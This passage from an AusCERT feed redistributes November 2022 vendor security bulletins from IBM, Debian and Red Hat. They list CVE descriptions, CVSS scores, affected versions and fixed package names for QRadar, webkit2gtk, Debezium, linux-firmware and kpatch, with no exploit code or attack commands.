code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
236116 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVEID: CVE-2022-2526
DESCRIPTION: systemd could allow a remote attacker to execute arbitrary code on
the system, caused by a use-after-free flaw due to the on_stream_io() function
and dns_stream_complete() function in "resolved-dns-stream.c" not incrementing
the reference counting for the DnsStream object. By sending a specially-crafted
request, an attacker could exploit this vulnerability to execute arbitrary code
or cause a denial of service condition on the system.
CVSS Base score: 8.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
235161 for the current score.
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Affected Products and Versions
+---------------------------------+------------------------------+
|Affected Product(s)              |Version(s)                    |
+---------------------------------+------------------------------+
|IBM QRadar Network Packet Capture|7.4.0 - 7.4.3 Fix Pack 5      |
+---------------------------------+------------------------------+
|IBM QRadar Network Packet Capture|7.5.0 - 7.5.0 Update Package 2|
+---------------------------------+------------------------------+
Remediation/Fixes
IBM encourages customers to update their systems promptly.
+-------------------------+-------+-------------------------------------------+
|Product                  |Version|Fix                                        |
+-------------------------+-------+-------------------------------------------+
|IBM QRadar Network Packet|7.4    |IBM QRadar Network Packet Capture 7.4.3 Fix|
|Capture                  |       |Pack 6                                     |
+-------------------------+-------+-------------------------------------------+
|IBM QRadar Network Packet|7.5    |IBM QRadar Network Packet Capture 7.5.0    |
|Capture                  |       |Update Package 3                           |
+-------------------------+-------+-------------------------------------------+
Workarounds and Mitigations
None
Change History
04 Nov 2022: Initial Publication
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.5790 - [Linux] IBM QRadar SIEM: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5790
Security Bulletin: IBM QRadar Assistant app for IBM QRadar SIEM includes
components with multiple known vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: IBM QRadar SIEM
Publisher: IBM
Operating System: Linux variants
Resolution: Patch/Upgrade
CVE Names: CVE-2022-2596 CVE-2022-0536 CVE-2022-0235
CVE-2022-0155 CVE-2021-43307 CVE-2021-42581
CVE-2021-23337 CVE-2021-3795 CVE-2020-28500
CVE-2020-15168 CVE-2020-8203 CVE-2020-7753
CVE-2019-10744
Original Bulletin:
https://www.ibm.com/support/pages/node/6838293
Comment: CVSS (Max): 9.8 CVE-2021-42581 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: IBM
Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
IBM QRadar Assistant app for IBM QRadar SIEM includes components with multiple
known vulnerabilities
Document Information
Document number : 6838293
Modified date : 09 November 2022
Product : IBM QRadar SIEM
Software version : 3.6.0
Operating system(s): Linux
Summary
The product includes vulnerable components (e.g., framework libraries) that may
be identified and exploited with automated tools. IBM has released a new
version which addresses the vulnerabilities.
Vulnerability Details
CVEID: CVE-2021-42581
DESCRIPTION: Ramda could allow a remote attacker to execute arbitrary code on
the system, caused by a prototype pollution in the mapObjIndexed function. By
supplying a specially-crafted object using the __proto__ argument, an attacker
could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
226072 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVEID: CVE-2022-0536
DESCRIPTION: Node.js follow-redirects module could allow a remote authenticated
attacker to obtain sensitive information, caused by a leakage of the
Authorization header from the same hostname during HTTPS to HTTP redirection.
By utilizing man-in-the-middle attack techniques, an attacker could exploit this
vulnerability to obtain Authorization header information, and use this
information to launch further attacks against the affected system.
CVSS Base score: 2.6
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
219551 for the current score.
CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)
CVEID: CVE-2022-0155
DESCRIPTION: follow-redirects could allow a remote attacker to obtain sensitive
information, caused by an unauthorized actor. By sending a specially-crafted
request, a remote authenticated attacker could exploit this vulnerability to
obtain private personal information and use this information to launch further
attacks against the affected system.
CVSS Base score: 8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
216974 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)
CVEID: CVE-2022-2596
DESCRIPTION: Node.js node-fetch module is vulnerable to a denial of service,
caused by a regular expression denial of service (ReDoS) flaw in the
isOriginPotentiallyTrustworthy() function in the referrer.js script. By sending
specially-crafted regex input, a remote attacker could exploit this
vulnerability to cause a denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
232616 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2020-15168
DESCRIPTION: Node.js node-fetch module is vulnerable to a denial of service,
caused by the failure to honor the size option after following a redirect. By
using a specially-crafted file, a remote attacker could exploit this
vulnerability to consume excessive resources on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
188155 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2022-0235
DESCRIPTION: Node.js node-fetch could allow a remote authenticated attacker to
obtain sensitive information, caused by a flaw when fetching a remote url with
Cookie. By sending a specially-crafted request, an attacker could exploit this
vulnerability to obtain sensitive information.
CVSS Base score: 6.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
217758 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CVEID: CVE-2020-7753
DESCRIPTION: trim is vulnerable to a denial of service. By sending a specially
crafted value, a remote attacker could exploit this vulnerability to cause a
regular expression denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
190630 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2020-28500
DESCRIPTION: Node.js lodash module is vulnerable to a denial of service, caused
by a regular expression denial of service (ReDoS) in the toNumber, trim and
trimEnd functions. By sending a specially-crafted request, a remote attacker
could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
196972 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2021-23337
DESCRIPTION: Node.js lodash module could allow a remote authenticated attacker
to execute arbitrary commands on the system, caused by a command injection flaw
in the template. By sending a specially-crafted request, an attacker could
exploit this vulnerability to execute arbitrary commands on the system.
CVSS Base score: 7.2
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
196797 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
CVEID: CVE-2019-10744
DESCRIPTION: Node.js lodash module is vulnerable to a denial of service, caused
by a prototype pollution flaw. By sending a specially-crafted request using a
constructor payload, a remote attacker could exploit this vulnerability to
inject properties onto Object.prototype to cause a denial of service condition.
CVSS Base score: 9.1
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
167415 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
CVEID: CVE-2020-8203
DESCRIPTION: Node.js lodash module is vulnerable to a denial of service, caused
by a prototype pollution attack. A remote attacker could exploit this
vulnerability using the merge, mergeWith, and defaultsDeep functions to inject
properties onto Object.prototype to crash the server and possibly execute
arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
183560 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2021-43307
DESCRIPTION: Node.js semver-regex module is vulnerable to a denial of service,
caused by a regular expression denial of service (ReDoS) flaw in the test()
method. By sending specially-crafted regex input, a remote attacker could
exploit this vulnerability to cause a denial of service.
CVSS Base score: 5.9
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
228061 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2021-3795
DESCRIPTION: semver-regex is vulnerable to a denial of service, caused by the
inefficient regular expression complexity. A remote attacker could exploit this
vulnerability to cause a denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
209463 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Affected Products and Versions
+--------------------+-------------+
|Affected Product(s) |Version(s) |
+--------------------+-------------+
|IBM QRadar Assistant|1.0.0 - 3.5.2|
+--------------------+-------------+
Remediation/Fixes
IBM encourages customers to update their systems promptly.
Update to 3.6.0
Workarounds and Mitigations
None
Change History
27 Oct 2022: Initial Publication
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.5789 - [Debian] webkit2gtk: CVSS (Max): 8.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5789
webkit2gtk security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: webkit2gtk
Publisher: Debian
Operating System: Debian GNU/Linux
Resolution: Patch/Upgrade
CVE Names: CVE-2022-42824 CVE-2022-42823 CVE-2022-42799
Original Bulletin:
https://lists.debian.org/debian-lts-announce/2022/11/msg00010.html
Comment: CVSS (Max): 8.8 CVE-2022-42823 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-3183-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Emilio Pozuelo Monfort
November 09, 2022 https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------
Package : webkit2gtk
Version : 2.38.2-1~deb10u1
CVE ID : CVE-2022-42799 CVE-2022-42823 CVE-2022-42824
The following vulnerabilities have been discovered in the WebKitGTK
web engine:
CVE-2022-42799
Jihwan Kim and Dohyun Lee discovered that visiting a malicious
website may lead to user interface spoofing.
CVE-2022-42823
Dohyun Lee discovered that processing maliciously crafted web
content may lead to arbitrary code execution.
CVE-2022-42824
Abdulrahman Alqabandi, Ryan Shin and Dohyun Lee discovered that
processing maliciously crafted web content may disclose sensitive
user information.
For Debian 10 buster, these problems have been fixed in version
2.38.2-1~deb10u1.
We recommend that you upgrade your webkit2gtk packages.
For the detailed security status of webkit2gtk please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/webkit2gtk
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yLKckNZI30y1K9AQjldw//XvFNWQNqRNcSotaZs6Pg3k4JxQPBpyqQ
yZ7rFeBscUXwyIvNqhCCri4aVKGcsY4FWZmf4Ojvp/oZO0xuyfXFvn1Vbrrxee30
pGwF+P+Q88IzeU5s4jhtW42vkwqPzyvJMD4z4fK3iVk+EvdYuRM2962RekcuW4Kv
RUB7Xovgq11RpyAd1slNxAMWChhx8WCC9emrFevPKL1vAOjbzMx5pn+DAJf+drYj
58rfZRf2bk39Z0PRUw9ZbbnW+ajpv1zvlkAq0zyORxq1vQZGQu6dR5r9ALntLD3/
TjA7yEUH9kWS5PzyrJd/ZA2gMWfSJwS8eFDdDy5vcgEX1vZQA8pe4zRyNDzhqtLj
PDleFnO36lgwr02AuWa9qoKB3l0O080aJ5iQ3HpAf3OTocm1rKYuL8YXrwp56Qn2
OWDbp4AO7Ftrdv8MwoQDmKyBPqhVpFcOSbbtokz4CPOLUmCsyWlgFDsj/Ab3H+1o
BrLmrBkuPR6myzZ65W3VcY8JdyYcFi6LcXDWTxoxzMGS2sHB+EtAh6E/s27Z67MV
s1NR2TkgpVaqcFzFw66tHlqAdTNZVjAqVHdgZMRBWKddXO4fsW4rNffm9It8nqJ4
XjSS7KJ1COsEZx4o9dxlGlaKNC+IybL5uQye0dx5CeH/HY5xwtMPsbVCklASB7bw
S2fhSbzW+OA=
=E8mz
-----END PGP SIGNATURE-----
ESB-2022.5788 - [RedHat] Red Hat Integration Debezium 1.9.7: CVSS (Max): 7.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5788
Red Hat Integration Debezium 1.9.7 security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Red Hat Integration Debezium 1.9.7
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2022-3171 CVE-2021-22569
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:7896
Comment: CVSS (Max): 7.5 CVE-2022-3171 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Integration Debezium 1.9.7 security update
Advisory ID: RHSA-2022:7896-01
Product: Red Hat Integration
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7896
Issue date: 2022-11-09
CVE Names: CVE-2021-22569 CVE-2022-3171
=====================================================================
1. Summary:
A security update for Debezium is now available for Red Hat Integration.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Debezium is a distributed platform that turns your existing databases into
event streams, so applications can see and respond immediately to each
row-level change in the databases.
Debezium is built on top of Apache Kafka and provides Kafka Connect
compatible connectors that monitor specific database management systems.
Debezium records the history of data changes in Kafka logs, from where your
application consumes them. This makes it possible for your application to
easily consume all of the events correctly and completely. Even if your
application stops unexpectedly, it will not miss anything: when the
application restarts, it will resume consuming the events where it left
off.
Security Fix(es):
* protobuf-java: potential DoS in the parsing procedure for binary data
(CVE-2021-22569)
* protobuf-java: timeout in parser leads to DoS (CVE-2022-3171)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
To apply this update, follow the standard installation procedure:
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4/html/installing_debezium_on_openshift/index
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4/html/installing_debezium_on_rhel/index
4. Bugs fixed (https://bugzilla.redhat.com/):
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data
2137645 - CVE-2022-3171 protobuf-java: timeout in parser leads to DoS
5. References:
https://access.redhat.com/security/cve/CVE-2021-22569
https://access.redhat.com/security/cve/CVE-2022-3171
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2022-Q4
6. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
-----END PGP SIGNATURE-----
ESB-2022.5787 - [RedHat] linux-firmware: CVSS (Max): 8.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5787
linux-firmware security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: linux-firmware
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2020-12321
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:7887
Comment: CVSS (Max): 8.8 CVE-2020-12321 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: linux-firmware security update
Advisory ID: RHSA-2022:7887-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7887
Issue date: 2022-11-09
CVE Names: CVE-2020-12321
=====================================================================
1. Summary:
An update for linux-firmware is now available for Red Hat Enterprise Linux
7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended
Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP
Solutions.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch
3. Description:
The linux-firmware packages contain all of the firmware files that are
required by various devices to operate.
Security Fix(es):
* hardware: buffer overflow in bluetooth firmware (CVE-2020-12321)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1893914 - CVE-2020-12321 hardware: buffer overflow in bluetooth firmware
6. Package List:
Red Hat Enterprise Linux Server AUS (v. 7.7):
Source:
linux-firmware-20190429-73.gitddde598.el7_7.src.rpm
noarch:
iwl100-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl1000-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl105-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl135-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2000-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2030-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl3160-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl3945-firmware-15.32.2.9-73.el7_7.noarch.rpm
iwl4965-firmware-228.61.2.24-73.el7_7.noarch.rpm
iwl5000-firmware-8.83.5.1_1-73.el7_7.noarch.rpm
iwl5150-firmware-8.24.2.2-73.el7_7.noarch.rpm
iwl6000-firmware-9.221.4.1-73.el7_7.noarch.rpm
iwl6000g2a-firmware-17.168.5.3-73.el7_7.noarch.rpm
iwl6000g2b-firmware-17.168.5.2-73.el7_7.noarch.rpm
iwl6050-firmware-41.28.5.1-73.el7_7.noarch.rpm
iwl7260-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl7265-firmware-22.0.7.0-73.el7_7.noarch.rpm
linux-firmware-20190429-73.gitddde598.el7_7.noarch.rpm
Red Hat Enterprise Linux Server E4S (v. 7.7):
Source:
linux-firmware-20190429-73.gitddde598.el7_7.src.rpm
noarch:
iwl100-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl1000-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl105-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl135-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2000-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2030-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl3160-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl3945-firmware-15.32.2.9-73.el7_7.noarch.rpm
iwl4965-firmware-228.61.2.24-73.el7_7.noarch.rpm
iwl5000-firmware-8.83.5.1_1-73.el7_7.noarch.rpm
iwl5150-firmware-8.24.2.2-73.el7_7.noarch.rpm
iwl6000-firmware-9.221.4.1-73.el7_7.noarch.rpm
iwl6000g2a-firmware-17.168.5.3-73.el7_7.noarch.rpm
iwl6000g2b-firmware-17.168.5.2-73.el7_7.noarch.rpm
iwl6050-firmware-41.28.5.1-73.el7_7.noarch.rpm
iwl7260-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl7265-firmware-22.0.7.0-73.el7_7.noarch.rpm
linux-firmware-20190429-73.gitddde598.el7_7.noarch.rpm
Red Hat Enterprise Linux Server TUS (v. 7.7):
Source:
linux-firmware-20190429-73.gitddde598.el7_7.src.rpm
noarch:
iwl100-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl1000-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl105-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl135-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2000-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2030-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl3160-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl3945-firmware-15.32.2.9-73.el7_7.noarch.rpm
iwl4965-firmware-228.61.2.24-73.el7_7.noarch.rpm
iwl5000-firmware-8.83.5.1_1-73.el7_7.noarch.rpm
iwl5150-firmware-8.24.2.2-73.el7_7.noarch.rpm
iwl6000-firmware-9.221.4.1-73.el7_7.noarch.rpm
iwl6000g2a-firmware-17.168.5.3-73.el7_7.noarch.rpm
iwl6000g2b-firmware-17.168.5.2-73.el7_7.noarch.rpm
iwl6050-firmware-41.28.5.1-73.el7_7.noarch.rpm
iwl7260-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl7265-firmware-22.0.7.0-73.el7_7.noarch.rpm
linux-firmware-20190429-73.gitddde598.el7_7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2020-12321
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
ESB-2022.5786 - [RedHat] kpatch-patch: CVSS (Max): 7.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5786
kpatch-patch security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: kpatch-patch
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2022-2588
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:7885
Comment: CVSS (Max): 7.8 CVE-2022-2588 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kpatch-patch security update
Advisory ID: RHSA-2022:7885-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7885
Issue date: 2022-11-09
CVE Names: CVE-2022-2588
=====================================================================
1. Summary:
An update for kpatch-patch is now available for Red Hat Enterprise Linux
8.2 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64
3. Description:
The kpatch management tool provides a kernel patching infrastructure which
allows you to patch a running kernel without rebooting or restarting any
processes.
Security Fix(es):
* kernel: a use-after-free in cls_route filter implementation may lead to
privilege escalation (CVE-2022-2588)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation
6. Package List:
Red Hat Enterprise Linux BaseOS E4S (v. 8.2):
Source:
kpatch-patch-4_18_0-193_80_1-1-2.el8_2.src.rpm
kpatch-patch-4_18_0-193_81_1-1-2.el8_2.src.rpm
kpatch-patch-4_18_0-193_87_1-1-1.el8_2.src.rpm
kpatch-patch-4_18_0-193_90_1-1-1.el8_2.src.rpm
kpatch-patch-4_18_0-193_91_1-1-1.el8_2.src.rpm
ppc64le:
kpatch-patch-4_18_0-193_80_1-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_80_1-debuginfo-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_80_1-debugsource-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_81_1-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_81_1-debuginfo-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_81_1-debugsource-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_87_1-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_87_1-debuginfo-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_87_1-debugsource-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_90_1-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_90_1-debuginfo-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_90_1-debugsource-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_91_1-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_91_1-debuginfo-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_91_1-debugsource-1-1.el8_2.ppc64le.rpm
x86_64:
kpatch-patch-4_18_0-193_80_1-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_80_1-debuginfo-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_80_1-debugsource-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_81_1-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_81_1-debuginfo-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_81_1-debugsource-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_87_1-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_87_1-debuginfo-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_87_1-debugsource-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_90_1-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_90_1-debuginfo-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_90_1-debugsource-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_91_1-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_91_1-debuginfo-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_91_1-debugsource-1-1.el8_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2022-2588
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
ESB-2022.5785 - [RedHat] OpenShift Logging: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5785
Openshift Logging 5.3.13 security and bug fix release
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: OpenShift Logging
